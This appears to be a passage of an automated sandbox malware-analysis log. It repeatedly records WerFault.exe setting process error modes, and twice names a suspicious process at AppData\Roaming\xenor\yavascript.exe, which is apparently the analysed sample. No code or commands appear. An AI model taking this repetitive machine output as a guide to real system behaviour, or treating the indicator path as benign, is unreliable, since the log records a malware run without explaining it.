            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
